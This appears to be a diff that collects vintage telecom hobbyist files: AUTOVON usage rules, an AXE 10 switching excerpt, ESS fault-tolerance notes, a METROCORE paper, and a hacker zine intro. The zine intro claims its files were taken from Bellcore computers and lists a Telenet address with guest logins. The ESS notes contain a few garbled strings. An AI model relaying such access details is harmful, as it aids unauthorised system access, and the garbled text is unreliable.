are operated in accordance with local restrictions. If you send data
via AUTOVON, it is necessary to observe the following restrictions:
1. DO NOT:
(a) transmit more than 18 continuous minutes.
(b) transmit more than one hour during the busy calling time.
(c) use a precedence higher than ROUTINE.
2. DO:
(a) use nonbusy hours for data transmission when possible
(b) dial "11" to properly condition telephone lines for data calls
(c) ensure that the device is equipped with an automatic disconnect
to free the telephone circuit after the device becomes inactive
for one minute.
XV. TELEPHONE TROUBLE REPORTING
A. Ensure that the AUTOVON number you used is correct. If you dialed the
number correctly and you are still having trouble, report the problem as
follows:
1. Keep the line connected if you can. Call the AUTOVON trouble desk at
550-1611 on a different line. (550-1611 will ring at your serving
AUTOVON switch.) Tell the trouble desk attendant:
(a) Your AUTOVON number and location
(b) Called party AUTOVON number and location
(c) What the problem was and when it occurred
(d) Get the attendant's initials then request a call back when
the trouble is repaired.
(e) If you hear an announcement, listen until the end; you will hear
a number (SSB Nr ____). Provide this to the trouble desk. This will
help trace the source of the trouble.
2. If you can not reache the AUTOVON trouble desk, call your local
repair service or the operator using a local base telephone. Be sure to
state that you are reporting an AUTOVON trouble.
REPAIR ITEMS SUCH AS BROKEN PARTS OR FRAYED CORDS ARE NOT AUTOVON PROBLEMS
AND SHOULD BE REFERRED TO THE LOCAL REPAIR SERVICE.
XVI. UNSATISFACTORY SERVICE REPORTING
A. If you are not satisfied with the results when you reported an AUTOVON
trouble, please inform DCSO Code B522 in writing. Keep in mind that we
have to give this report to engineers and technicians for resolution, so
we have to ask for some fairly technical details. If you need help in making
the report, contact you local telecommunications officer or OIC of the
station switchboard. The following information is necessary:
1. Your station name, unit name, AUTOVON telephone number and whether the
trouble concerns a telephone or a switchboard.
2. The time and date you first noticed the problem, the AUTOVON trouble
desk you reported it to and whether the problem was solved.
3. What kind of problem you had and the impact it had on your mission.
B. If you are unhappy with the agency which was supposed to fix the problem,
tell us exactly what unit it is, when you called them, when they arrived
and when/if the problem was repaired. Let us know why you think their
service was unsatisfactory. If this is a repeated problem, inform us
how many times and whether your comments apply to each occurrence.
C. Give us any background on the problem you have including what the
maintenance technicians say the trouble was. Suggest any changes you
would like to see. Pinpoint any trends of performance which may result
in unsatisfactory service.
1. Send the report to the agency nearest you:
(a) Action:
(1) DCA HQ, DCSO
Code B522
Washington, D.C. 20305-2000
(2) DCA EUR
Code E520
APO New York, NY 09131
(3) DCA PAC
Code P420
Wheeler AFB, Hi 96854
(b) Info:
O&M Agency in your area responsible for providing service
XVII. GLOBAL AUTOVON CALLING
USERS are normally limited to placing ROUTINE calls within a geographic
area whether they do the dialling or go through an operator. To call
outside a calling area, dial "0" and ask the switchboard operatore
for assistance.

+204
View File
@@ -0,0 +1,204 @@
///////////////////////////////////////////////////////////////////////////
// //
// The AXE 10 Subscriber Switching Subsystem //
// Excerpted from Introduction to Digital Communications Switching //
// Expunged into Digital Form by Keltic Phr0st //
// //
///////////////////////////////////////////////////////////////////////////
(I've often been told it was lame to type up files of already present info.
In which case, fuck off - how is anyone supposed to learn, and how is the
info supposed to spread??? And how do you know its accurate??? Anyway -
hope you enjoy this release - There's Plenty more to come)
The AXE System will serve well as an introduction to the functions of the
subscriber's concentration stage of a PCM Local Exchange. Figure 5.20
illustrated that, as analog-to-digital conversion is moved to the periphery
of the exchange, many other functions are moved to the line interface also.
The resulting line interface is shown in functional terms in fig 5.21.
These functions will be discussed more fully in Chapter 8; It suffices now
to indicate that the elements of the mnemonic BORSCHT are evident in fig
5.21:
B Battery Feed
O OverVoltage protection
R Ringing
S Supervision (Detection of seizure and release) or Supervision
and Signalling
C Coding (Omitted within analogue enviroment - KpT)
H Hybrid or 2-wire to 4-wire conversion
T Test
The principles of subscriber switching in the AXE system are illustrated
in fig 5.22. Subscriber modules of 2048 subscribers are divided into sub
modules of 128 subscribers, each with its own time switch, key sender
receivers, test circuits and an optional 2Mb/s link to the group switching
stage. All 16 sub modules have access to a common time switch bus haing
512 Channels. Thus, connection to the group stage is effected via a channel
of the sub-module's 2Mb/s link or, if all these are busy or the link is not
fitted, via one of the 512 Channels linking to other sub-modules over the
time switch bus. There is thus a time division bus interconnecting the lines
within each sub-module called the device speech bus (DEVSB) and a single
512 channel bus interconnecting all 16 modules called the Time Switch Bus
(TSB). The speech store in each time switch therefore has 768 storage
locations. This is more adventurous than the devices described earlier
in this chapter.
There is capacity, therefore, to provide a normal minimum
concentration of 4 to 1 (2048 subscriber's lines to sixteen 32-Channel links
to the group stage). Only sufficient group stage links will be provided
to carry the traffic offered by subscribers on the particular exchange and,
because of the time switch bus (TSB) Link, traffic from all subscribers has
full availability to al channels of all the links fitted.
Figure 5.23 shows a block diagram of the time switch in concept only,
illustrating the relationship of channel capacities of the various inlets
to DEVSB and TSB. At any time slot, the time switch will read out a sample
from the speech store on to the DEVSB destined for a subscriber or a
channel to the group switch or a VF receiver or to line test and at the
same time it will read a sample on to the the TSB Bus detsined for the
group switch or for a subscriber via another subscriber stage time switch.
The AXE10 subscriber's stage time switch is therefore performing space
switching by performing more than one time-slot interchange at the same
channel time-slot.
The Control memory contains the data on the destination of the
sample stored in the speech memory. This data is loaded by the device
processor as a result of instructions received on the DEVSB Bus. Note
that the speech memory is loaded at each channel time by a sample from
DEVSB and a sample from TSB.
The speech memory capacity includes space for two 32-Channel Links
to the group switch, JTC, although the normal maximum is one JTC per LSM.
There is also spare capacity for more than the normal 8 VF receivers
the normal 4 Line test facilities.
The diagram of the line interface (fig 5.21) Indicates that there
two further time division buses involved; the control bus DEVCB, and the
test Bus TEST B. The Control Bus provides acces from the regional processor
of the line module EMRP to the device controllers of the constituent
elements of the line module. The Control structure of the line module is
illustrated in fig 5.24.
The provision of solid state electronic switching right out to the
subscriber's line interface, partcularly in TDM form, makes physical access
to the subscriber's line for testing purposes impossible. Line and Trunk
testing is a subject that will be returned to in Chapter 8. At this stage
it is neccessary to point to the need to provide other means, in TDM
exchanges, to gain access to the lines. The access method employed has
become almost classical in its universal adoption. Figure 5.25 illustrates
the contents of the LIC block labelled Test Access in fig 5.21. Test access
relays are provided which normally (when released) provide a through
connection from the line to the line interface. Operation of one test access
relay connects the line to a test bus for outward testing, whereas operation
of the other relay provides access from the test bus to the line interface
for inwards testing of the interface and other exchange functions. In some
systems (notable ITT System 12) the relays are also used to switch in a
spare line circuit in place of a faulty line interface.
The interface arrangements with these three bus systems, DEVSB,
DEVCB and TEST B, are shown in fig 5.26. This introduces a point, expanded
in the next chapter, that time division relates, not only to the circuit
switching function, but also to the control functions of the telephone
exchange.
REMOTE CONCENTRATORS
====================
The migration of the bulk of the cost of a telephone exchange to the
periphery, caused, in part, by PCM TDM and illustrated in fig 5.20, has
been encouraged to proceed still further. One aspect of this is the advent
of ISDN where the migration reaches the subscriber's instrument which
becomes a communications terminal and work-station as a result. Another,
less drastic aspect is the attractiveness of locating the subscriber's
concentration stage remote from the telephone exchange. There was always
a requirement for remote concentrators and suitable space division
equipments were designed, mainly for rural application. The costs involved
never justified such concentrators in more urban locations since a reduction
in the local cable of between 80% and 90% (One link to the exchange for
every 10-20 subscribers instead of one per subscriber) could not be made
to pay for the cost of the remote switch plus its secured power supply
and ancilliaries. Added to this was the extra maintenance effort involved
in routine maintenance of remote electro-mechanical devices.
With PCM TDM, the reduction in links to the main exchange is much
greater (two channels for every 10 to 20 subscribers), the power requirement
is lower (although seldom low enough for power to be supplied down the line
from the parent exchange), and the necessarily complicated signalling can be
accomodated on common channel signalling links. Almost all practical PCM
local switching systems therefore include remote multiplexor, remote
concentrator, and possibly, remote simplified exchange options. Because
of TDM, these options can also accomodate diversity of routings to the
parent exchange, or even exchanges, thus overcoming the other disadvantage
of concentrators that service is lost to large numbers of providers should
the exchange link be broken. At the least, concentrators with just one link
to the parent continue to provide local service when that link is broken.
Because the concentrator is cut off from the processing power of the parent
exchange, this residual local service is probably not charged. This is small
comfort, however, to the subscriber, accustomed to access to only a few
hundreds of nearby subscribers.
The AXE10 concentrtaor is similar to the subscribers switching stage
just described except that the links to the group stage now become 30 channel
CEPT Systems, and the control links from the regional processor to the
central control are formed by using common channel signalling via time-slot
16 of two of the 30 channel links to the parent exchange. This concentrator
arrangement is shown as part of the diagram of a full AXE 10 local exchange
in fig 5.27. The diagram illustrates that the only difference in the
remotely located subscriber stage is the use of common channel signalling
to communicate between the remote regional processors and the exchange
central processor.
CHANNEL MODULARITY AND SUBSCRIBER SIGNALLING
============================================
In this Brief survey of a practical subscriber's switching system
several concepts have been introduced without detailed discussion. One, which
is evident from the diagrams, is that a modularity of 30 Channels has been
increased to 32. Similarly, the diagrams reveal units devoted to signalling:
KRD (MF Receivers) and ST-C and ST-R (Common channel signalling equipment).
Channel Modularity
------------------
In describing the 30-Channel system, channel 0 was identified as
being reserved for synchronisation, frame alignment and other link related
functions, and channel 16 for signalling. However, these functions, possibly
required outside the exchange, are certainly not neccesary within the
exchange. Most practical switching systems, therefore, utilise all 32
channels for traffic carrying connections. Channel 16 is identified in the
CEPT system as a signalling channel and a quartet system is defined for
channel associated signalling. It is often appropriate, therefore, to
utilise channel 16 as a first choice for common channel signalling in which
case the quartet protocol is abandoned and the channel becomes a normal
communications channel of 64 kbit/sec capacity. This is the arrangement
chosen for the AXE10 system. Throughout the book there is a distinction
drawn between channel 16 signalling (Channel associated in Quartets), and
signalling over channel 16, normally probably common channel but on occaison
the channel may be used for ordinary traffic carrying circuits. As an
example, were the remote concentrator of fig 5.27 to require 3 or more "30"
channel links to the parent exchange, then the remaining channel 16's could
be devoted to ordinary traffic.
Subscriber Signalling
---------------------
Signalling from the subscriber to the exchange is normally loop seizure and
release, with either loop-disconnect dial impulses or multi frequency key
sender signalling for routing information. In either case the digital
exchange must provide means for detecting the routing request information
and passing it on to control. If loop disconnect is used then this can
be detected, in the PCM line circuit scanning process, by (in the case of
AXE 10) The LIC device controller and passed on to the regional processor.
MF Signalling will pass through the line circuit and be PCM - encoded.
There must, therefore, be a MF receiver associated with the line circuit
when it is seized and a TDM connection completed to this receiver which
detects the digitised MF information, translates it and passes the resulting
numerical information to the regional processor.
///// ///// ///// ///// // Phr0st // ///// ///// ///// /////
File diff suppressed because it is too large Load Diff
+47
View File
@@ -0,0 +1,47 @@
$%$%$%$%$%$%$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%
%$% $%$
$%$ Bellcore Technical Journal %$%
%$% Volume 1 Issue 1 $%$
$%$ $%$
$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$
Welcome to the BCTJ premier issue....The following article are brought to
you from the combined effort of the members of Bellcore.
Note: The Members are Myself, Doctor Cypher, Chippy, Byte Man, Mr Xerox, Logex, King Blotto, Mr. Mayhem..and special thanx to Phiber Optik..LOD!
These files Are straight from the Bellcore computers...Mirage, Thumper,
etc...Also these files are for *Experianced* Telecommuncations Hobbiests..
Also note I went through a hell of alot of work editing the EMACS, ok ?
Well here Goes...
FILE MEMORY AUTHOR DISCRIPTION
-------- --------- ------------- ----------------------------------------
BCTJ1.01 02k Doc Telecom Introduction
BCTJ1.02 16k BellCore Information & Faults in ESS
BCTJ1.03 24k BellCore MetroCore Documentation
BCTJ1.04 08k Bellcore Ethernet Fields
BCTJ1.05 33k Bellcore ISDN "C" Source file
BCTJ1.06 50k Bellcore Microwave Image Transimpedence
Also if you need to contact us leave us mail on the account "BellCore"
on Lunitics Labs BBS <415> 278-7421.
UUCP Chippy = ames!claris!wet!carlos
UUCP Doc Telecom = ames!claris!wet!DOC
or you can contact us through altos in munich..
from Telenet 026245890040004,PCP-ID,PASSWORD
login as : guest, gast, demo, xyz, x25
Dedication: Phil Karn , MRE
- Doc Telecom

+384
View File
@@ -0,0 +1,384 @@
$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$
%$% %$%
$%$ Electronic Switching System Faults $%$
%$% %$%
$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$
"Notes from No 2 ESS Administration and Maintenance Plan,"
"BSTJ Vol 48, 1969"
"Data Maintenance"
Memory mutilation results from hardware faults and program bugs.
During nonsynchronous operation mismatch detection not available so
there may be a long period of time during which mutilation occurs.
Mismatch detection useless in finding data mutilation caused by program bugs.
Data maintenance aided by
ease of communication among programs,
absence of linked lists, and
per call memory allocation (Call processing program addressing is relative to the allocated memory, reducing scope of data accesses).
Defensive programming techniques:
Range check table indexes,
Zero check derived transfer-to addresses, and
Distinct program and data errors prevent programs being read as data.
Audit programs detect bad data.
Audits run periodically or as requested from tty.
Separate audits for different memory blocks
Audits correct by idling memory blocks containing bad data.
System recovery initiated by control unit switch during simplex operation, control
unit switch can be caused by bad data or bugs that cause sanity time out.
System recovery Funtions:
Make call store consistent with state of periphery.
Clear memory associated with program in control at time of recovery,
Run audits,
Repeat the above with widening scope of memory initialization until sanity obtained
"Notes from Design of Recovery Strategies for A Fault Tolerant No. 4 ESS"
"by R. J Willet - BSTJ vol 61, no 10, 4-13-82"
"Objectives"
616,000 call attempts/hour
100,000 acive terminations
Downtime less than 2 hours in 40 years
Not cost-effective (or possible) to remove all software errors - minimize
number of service effecting errors and analyze data for cause.
"Software Recovery"
Reconstruct data from associated information - slow, disturbs few calls.
Reinitialize memory structure - fast, disturbs many calls.
"Audit Programs"
Provide for integrity of system memory
Structured into mutilation detection and correction modules
Detection modules run continiously in background
Detection modules augmented by defensive checks in operational programs
Call correction modules to correct errors found by background audits or
defensive checks.
"System Integrity Programs"
Provide for integrity of programs
Monitor job scheduling and sequencing for frequency and execution times
Use sanity timers
Call audits or reinitialize system to correct errors.
"Recovery from software problems"
Software problems caused by program errors or bad data
Out-of-range accesses trigger hardware interrupt, recovery
requires correction of data, or killing of call and return of control
to a safe point.
Inhibit (pest) interrupts while audits are correcting problem,
risky, but assumes single software fault.
In cases where the out-of-range error can be isolated to a single unit can use frame level pesting, otherwise use system level pesting.
Software recovery does not consider the possibility of a hardware fault.
Recovery cannot fix a program bug. Running pested may allows the system to
operate in a degraded fashion while maintenance personnel analyze data and
correct program.
The buffer overflow problem - may be caused by program error.
Buffers protected by hardware overflow interrupts.
Recovery runs the buffer unloader program to unload the buffer and audits the task dispenser program to ensure the unloader is scheduled properly.
The overflow interrupt is pested.
If problem continues, hardware is suspect.
"No. 4 ESS: Maintenance Software"
"by M. N. Meyers, W. A. Routt and K. W. Yoder,"
"BSTJ Vol. 56, No. 7, September 1977"
"Software Error Recovery"
Since system operation is dependent on data in memories, and memories can be written, there is a possibility the memory will be in a state that precludes operation.
System must be as error-free as possibile.
Since system cannot be completely error-free, it must be error tolerant.
"Classification of software errors"
Errors in interfaces between software modules.
Non-conformity to systems rules.
KsO$H@! fwLogic errors.
Coding errors.
Complex man-machine interfaces that lead to procedural errors.
"Effects of software errors"
Loss of viability
Loss of call processing
Loss of a facility
Loss of a functions
Loss of capacity
Loss of single call
No effect
"Error Prevention"
Standardization,
Simplification,
Improved Documentation,
I wonder why improved testing isn't listed
"Error Tolerance"
Error tolerance acheived through defensive programming and defensive memory.
Programs attempt to remain operational in presence of errors
Restrict access to data to noncritical regions where errors have minor impact. (Using special instrutions to write to critical memory).
Checking state codes
Range Checks
Positive Decisions
Symbolic Addressing
Interpreting all possible stimuli
Link by index rather than absolute address
Special purpose memory allocators
"Error Handling"
"Software Integrity Control"
Receives reports of all software errors, decides and activates corrective action.
Corrective action: request an audit, or if history indicates repition, request a phase of system initialization.
Receives reports of overload - must decide if these are true, or are the results of software errors and take appropriate action.
"Audits"
Detect and correct data errors.
Control structure and audit routines specific to particular data structures.
Control structure schedules routine audits.
Demand audits run when errors found or suspect.
Error detection through: comparison of duplicate structures, association (correct structures linked together), and semantics (data is reasonably correct).
U"qGu"Integrity monitor system"
Detects shceduling and cycling irregularities and los of major system functions.
Time monitors detect basic sanity
Base level monitor verifies validity of base cycle
Test call program observes progress of test calls
"Recovery"
Remedial actions - audits - correct specific errors.
If remedial actions fail undertake system recovery.
System recovery reconfigures hardware and initializes memory.
System recovery initiated upon detection of:
Mutilation of program memory
Loss of vital system function,
Loss of major facility,
Escalation of remedial actions,
Software integrity monitor problems,
Sanity Timeout
Mutilation of software clock,
Duplex failure
System recovery phases:
Phase 1 - initialize specific areas of transient memory - does not kill calls,
Phase 2 - reconfigure peripheral hardware and initialize all transient memory - kills
only non-stable calls.
Phase 3 - reconfigure processors, initialize all memory - kills only non-stable calls.
Phase 4 - totally initialize system - kills all calls - manual activation only.
More detailed and specific manual recovery procedures can be initiated.
"Notes from DS5C 3.00.00.00 - Issue 2 No. 5 ESS Maintenance Plan, 40288-500"
Up to 127 interface module processors - each is duplicated.
No simplex failure causes service loss, duplex failures cause service loss for only a few terminations.
Central Processor (CP) is duplicated.
The time multiplexed switch contains a duplicated processor.
The Control Distribution Units are not duplicated, since a single one is sufficient for inter-processor communications.
The Input/Output Processor is duplicated.
CP maintenance is under control of CP programs.
CP programs have minimal involvement in peripheral unit maintenance.
IM resposible for own maintenance, with few exceptions (manual requests, etc.).
IM uses self-checking hardware and operational checks.
Inter-processor messages use a reliable communications protocol.
Test for errors during use, scheduled tests for equipment not frequently used or in standby mode.
Test error detecting capabilities by inducing errors.
Operational software can detect some hardware errors through in-line checks,
and keep history to isolate error.
Audits and defensive checks to reduce software errors.
Software reliability is obtained at the expense of real time performance.
Defensive checks:
Range checks on pointers and indexes.
Duplicate copies of data at two different locations to detect mutilation.
Two-way linked lists.
Maintain and check redundant status information.
Positive decisions
Limited use of GOTOs
One entry point per module
Check incoming buffered data for mutilation while in buffer.
Ack timeouts.
Audits check for resources in an invalid state and restore the resource to a valid state.
Audits try to detect erroneous states before system performance is affected.
Loss of all of a given class of resource may halt call processing.
Long loops in programs cause them to consume all of the real time and put the system in overload.
Auditing of data resident in more than one processor leads to a race condition.
If audits find one error in a data structure then all associated data is assume to be bad.
Processes audited by timing, timeout in transient states indicated errors.
Scheduled audits have low priority.
Errors detected by audits are output on TTY.
Audit history is maintained in CP and can be queried.
Audits are stitched together during initialization.
Craft can request audits.
CP has audits for its data, IM has audits for its data, CP controls audits for data shared by
IM and CP.
Test calls are generated and monitored to detect timing irregularities.
Operating system monitors scheduling to detect overload or fault.
Hardware sanity timers to detect basic processor sanity.
Overload is caused by a shortage of resources.
In overload give preference to terminating traffic.
During growth intervals, audits must be gracefully updated to test new resources.
"Notes from DS5D 5.00.02.00 - Issue 1 Feature Control Development Specification Case 40288-100"
Feature control programs must explicitly record state during real time break, even if the
state can be derived implicitly by the program.
Restricted control of the process stack improves reliability.
Program design represented by finite state machine.
"Notes from 5ESS AUDITS Description and Procedures Manual, Issue 2, 1983"
Audits are 10% of 5ESS software.
Audits are powerful enough to disconnect stable calls and initialize the system.
5ESS software is divided into 5 areas:
operating system,
call processing,
Administration,
database, and
maintenance (The largest).
Audits are responsible for data in each area.
The maintenance area uses five system integrity features:
Asserts (defensive checks),
integrity monitors (sanity timers and other checks),
initializations, and audits.
Application audits run under OSDS which provides:
Process management,
Resource allocation,
Process synchronization and communication,
Inter-processor communication,
IM interrupt and fault handling,
Timing services.
DMERT has audits that run in the System Integrity Monitor environment at the CP, not descibed here.
Audit control in charge of audits in all environments, different audits
are run in different environments.
Routine audits are segmented - 20 millisecond segments for error detection,
40 milliseconds for error correction.
Audits may run in 5 modes:
routine segmented,
(run at lowest priority, take real-time breaks, output results to file,
escalate if critical error found)
elevated segmented,
(run at second lowest priority, take real-time breaks, caused by; input messages,
asserts, single process purges, other audits, if cannot correct errors in 40 msec,
either escalate or return to safe point)
nonsegmented,
(no real-time breaks)
initialization,
(run sets of audits back-to-back with no real-time break)
postinitialization.
(used to restore non-critical data after initialization)
A single event number is assigned to all audit actions resulting from the
same error.
Asserts placed in operational code (includeing audit code) to detect:
Out-of-range indexes and pointers
Redundancy on duplicate data,
Point-to/point-back linkage,
consistency between related data,
invalid function return codes.
Failing asserts usually trigger audits.
Asserts are a convention for defensive programming that standardize history keeping, and output messages.
Audits classify errors as: process errors, non-process errors, or audit failures.
Process errors cause single process purge.
Non-process errors are accumulated until end of segment and then an elevated
audit is scheduled to correct them.
Audit failures (the error is such that the audit can't continue) result in
scheduling of audits to fix the error.
Interprocessor audits check duplicate data in different processors.
Interprocessor audits run in routine and elevated segmented modes.
Interprocessor audits triggered manually, by asserts, and routinely.
Interprocessor audits correct data by making CP agree with IM.
Interprocessor audits divided into partitions that run on a single processor.
Interprocessor audit execution controled by CP, which receives completetion
reports from each partition.
About 70 application audits.
Current software development methodologies incapable of producing fault-free
programs.
Operator mistakes introduce incorrect data into system.
Hardware faults cause data mutilation.
Early detection and correction of fault effect retains system availability,
at a cost (usually mishandling of single job).
"DEFINITIONS"
Fault - improper action
Error - the result of some faults - an erroneous states
Failure - incorrect system output (wrong or delayed)
Outage - Failure effecting significant number of jobs
Fault tolerant systems prevent errors from becoming failures and failures
from becoming outages.
Faults that do not produce an erroneous state are not detectable
"CLASSIFICATION"
"ESS Software Reliability"
"Objectives"
Same as achieved by electro-mechanical systems:
No more than 2 hours total outage time in 40 years (720 seconds allocated to outages called by software faults).
No more than 2 calls out of 10,000 mishandled.
About 100-200 call attempts/sec
Tolerable response times range from milli-seconds to seconds.
"System Characteristics - 1ESS, 1AESS, 4ESS"
Base level cycle partitioned into A,B,C,D,E and interject priorities.
Interrupts for timing and hardware exceptions.
I/O at interrupt level
Time shared CPU with segmented (interleaved) processing
System memory paritioned into:
Text
Parameters (describe office size)
Translations (describe connections)
Shared Memory
Note: This file was in EMACS , I hope I edited it good enough to read, so that it provides use. -DT
----------------------------------------------------------------------------

+545
View File
@@ -0,0 +1,545 @@
OVERVIEW OF BELLCORE METROCORE\*(Tm NETWORK
A. Albanese, M. W. Garrett, A. Ippoliti,
M. A. Karr, M. Maszczak, and D. Shia
Bell Communications Research
Morristown, New Jersey 07960, USA
(201) 829-4291
The Bellcore METROCORE\*(Tm network is a test bed prototype of a
metropolitan area network (MAN) for exploring new network concepts
and technology applications in broadband communications.
The present design and status of the METROCORE network
research prototype are outlined.
This system operates at 150 Mb/s with the potential for
upgrading to 2.4 Gb/s.
A basic hardware architecture has been designed which consists
of a network interface (media access control (MAC) layer), and
several independent, modular units that interface to various services.
At the MAC layer, integrated services are supported by giving priority to
those traffic types requiring bounded delay.
The organization is modular, allowing components and services to be added
or improved while redesigning the minimum amount of hardware.
The software network architecture has also been designed and it includes
a network controller to configure, monitor, and administer the network.
The Bellcore METROCORE\*(Tm
METROCORE is a trademark of Bell Communications Research, Inc.
This paper will be presented at the IFIP WG 6.4 Workshop HSLAN'88,
April 14-15, 1988, Liege, Belgium.
network is a Metropolitan Area Network (MAN)
prototype using an enhanced version of Fasnet [LIMB82]
as its Media Access Control (MAC) protocol.
This prototype
serves as a test-bed for research in the integration of
diverse services onto a unified packet switched network.
The protocol provides special access for traffic with
delay constraints.
There is also a mechanism for ensuring
fairness among the active nodes.
Nodes are connected to each other by a dual bus network
similar to the architecture being considered by IEEE 802.6.
Rather than using passive taps as in the original Fasnet proposal,
active regeneration is used with optical fault bypass devices
and a stand by fiber optic link to insure fail-safty (Figure^1).
"Metrocore implementation with four nodes."
The hardware designed for each node includes a
MAC layer circuit which interfaces the node to the
network.
This exchanges packets across a specialized internal
communication bus with a variety of "service processors," (SPs)
which serve as interfaces to the services running on the network.
The internal bus is called the "Fast Packet Bus" (FPB), and
is implemented in a similar way to the backplane of a double VME card cage.
However, only the physical VME specification is used since
the VME electrical definition,
like most computer backplanes,
can not provide as much bandwidth as we desire for this application.
Each SP ideally occupies one board, allowing several services
to be present in a node.
In addition to the MAC circuit and the SPs, there
is a node controller circuit which keeps track of statistics
for billing, management, administration, and operations and takes care
of diagnostics and fault control.
The service processors we anticipate include services such as
telephone, television, computers, disk servers, and a LAN interconnection.
The LAN service processor was designed first since
it is an important service to explore in the near term,
and because this allows us to connect (indirectly) anything that
already uses Ethernet.
This processor consists of five modular circuits implemented in
four boards that may be modified for use in other SPs.
This processor implements a transparent
protocol which encapsulates Ethernet packets for transport
across Fasnet and retransmission on a remote Ethernet.
Other suggested protocols for service integration for interconnected
LANs [FRAT87] and routing for interconnected MANs [STRG87a,b]
have not been implemented yet.
Figure^2 shows the system block diagram. Each component is described
below, followed by brief discussions of the software architecture,
and a Gb/s network enhancement.
"Metrocore node."
"Optical Transmission System"
We are presently using an off-the-shelf transmission system
with single mode optical fibers at 150 Mb/s and
a wavelength of 1.3 &mu m&.
This system was chosen because it provides a virtual clear channel,
and can tolerate the long strings of consecutive zeros which occur between
the head-end node (which sends blank packets) and the node that uses
a packet by filling in the empty data field.
The system does its own scrambling and clock recovery.
Connections between nodes are point-to-point, but
an optical fail-safe devices may be inserted to make the node appear
transparent in case of a local node failure [ALBA82, LOH86].
A stand by fiber optical link allows network reconfiguration in case one of
the links is not functioning.
"MAC Chip"
This chip is the major component of the MAC circuit.
The MAC chip executes the media access layer protocol and thus governs the
flow of data onto the network.
Two chips are needed for the two directions of traffic on the network.
The design is implemented as a
semi-custom chip manufactured by Motorola, using emitter coupled logic
(ECL) technology for high-speed performance.
The maximum speed was measured at 310^Mb/s.
The MAC chip replaces a whole board of SSI/MSI chips in a
previous prototype.
The MAC chip reads the various fields of the packet header to
execute proper transmission, and signals interface circuits
for reception of packets.
Other functions include synchronization of the chip to the incoming packet
stream, generation of timing signals and 1 &times& 16 serial to parallel
conversion.
Each chip contains the circuitry needed to execute special
functions associated with the end nodes.
Thus, as a fail-safe mechanism,
a middle node may become the head-end if the original head-end fails or
if the network becomes severed.
The chip was designed and simulated on a Daisy CAD workstation using
a library of components made available from Motorola.
The Motorola
computer system was then used for the final timing simulation, race-condition
test, placement and routing of the metal paths.
This chip is equivalent to 2500 ECL gates and comes in a 149-pin PGA
package. 98% of the available circuitry and pins were used.
"MAC Circuit"
The MAC circuit consists of MAC chips, address recognition circuits
(address filters) , bus arbiters, a head-end enable detection circuit
(activity detect), a head-end access field generator,
ECL/TTL converters, control circuitry, and a power-up reset
circuit (see Figure^3).
There is generally two of everything due to the two unidirectional
busses used in Fasnet.
"Medium Access Control Circuit."
Each MAC chip feeds incoming data, in a 16-bit parallel word, into an
address recognition circuit which compares the address field
of the packet to a group address and a single node address.
Thus a node may be addressed individually or as part of a multi-cast group.
The link-layer address is structured so that the first bit (most
significant) indicates group or node address (0/1), the next
11 bits identify the node or group, and the last four constitute
a sub-address indicating the intended service processor.
The address circuit is implemented
in TTL logic with ECL/TTL converters between the MAC chip and itself.
Data and control information is passed on to the service processors
through the two outgoing paths to the Fast Packet Bus.
Four bus arbiter circuits are included for the four incoming paths
from the FPB.
These paths carry data destined for transmission
from the service processors to the MAC chips.
There are "data" and "voice" paths for each of two MAC chips.
(The data and voice paths are not limited to those services but are used
to differentiate between traffic which can tolerate network delays (low
priority) and those which can not (high priority).
The paths are separated
because the two Fasnet lines operate independently, and the two cycles
(for different priority traffic) are also independent.
The bus arbiters choose which of competing service processors gets
next access to a given path of the FPB, and therefore to the network.
The choice is made using a simple round-robin scheme.
Processors using the same FBP path
are not further prioritized, although this could be done
using a more complex bus arbiter circuit.
An activity detection circuit monitors the
synchronization at the receiver to discover whether
the node is to be head-end or not.
The head-end node will
have a desable receiver for the line that it heads and thus
would always remain head-end.
A middle node (Figure^1) will become
head-end in the event of a failure just upstream of itself.
If the receiver does not provide a carrier detect signal,
the MAC synchronization function could be used:
When the MAC fails to synchronize for 2 msec (for example),
it turns on its head-end function, and then monitors the incoming
data stream for a valid Fasnet synchronization pattern.
Reception of such a pattern would then turn off the head-end
function for that node returning to its middle node function.
The access field generator circuit (see Figure^3), implemented as
a PLA (programmable logic array) is required if a node is a head-end.
This takes care of "turning around" the start and end bits of the Fasnet
access field, which in turn operate the network cycles.
Every
node which might be head-end must have this.
It is possible
to avoid putting this circuit in every node; the tradeoff being
that all nodes between the fault and the first head-end-capable
node would go down.
The MAC chips require information to determine system parameters such
as packet size etc.
These, as well as the node addresses are stored
in a small register and are generally programmed on power-up by a control
circuit in the node.
The remaining functions in Figure^3 are the power-up reset circuit
which holds reset high until the power supply voltage stablizes;
and a local oscillator which serves as system clock in head-end nodes.
"Fast Packet Bus"
The backplane of the card cage has two 96-pin connectors which carry
the two incoming paths to the processors, and the four outgoing paths
to the MAC circuit.
Several pins also supply power and ground (TTL) to the boards.
In addition, there is a synchronous serial line which allows the
node controller SP to down load and read the stored MAC parameters.
On each incoming path, there are 16 bits of data; a four bit sub-address
which identifies the processor to receive the packet; a four bit control
field which comes from the beginning of the information part of the
packet, and may be used optionally to give the SP a code already parsed
from the packet. A signal called
"Packet Ready" indicates the beginning of a new, valid packet, and
two clock signals (at about 10 MHz and 20 MHz) are given from which
the MAC circuit's two phase clock (&phi&1 and &phi&2) are derived.
On each outgoing path there are again, 16 bits of data.
A strobe
signal from the MAC chip prompts each word from the processor.
Each processor (up to four) has its own set of handshaking lines with
the bus arbiter.
If more than four processors use a single path, then this handshaking
may be daisy-chained on every fourth processor.
The processor wishing to
transmit raises its "request" line; the bus arbiter selects the next
requesting processor in turn and responds with an "acknowledge."
The processor
then raises its first word of data together with
"data ready."
When the MAC gets access to the network, it will strobe the processor
for the following words.
This type of internal node bus uses a lot of pins (192).
The choice could be made to reduce the number of wires by time multiplexing
signals of the various buses.
This however, would require a large and
complex buffer on the MAC circuit, which would be more difficult
than having a large backplane bus.
The present FPB has the advantage
of not presenting any bottleneck at all beyond that caused by
the node access to the network (i. e. same-priority, same-direction packets
must compete for the network at the MAC chip anyway).
"Node Controller Circuit"
When a node is powered up, all processors as well as the
MAC circuit must know the node's address.
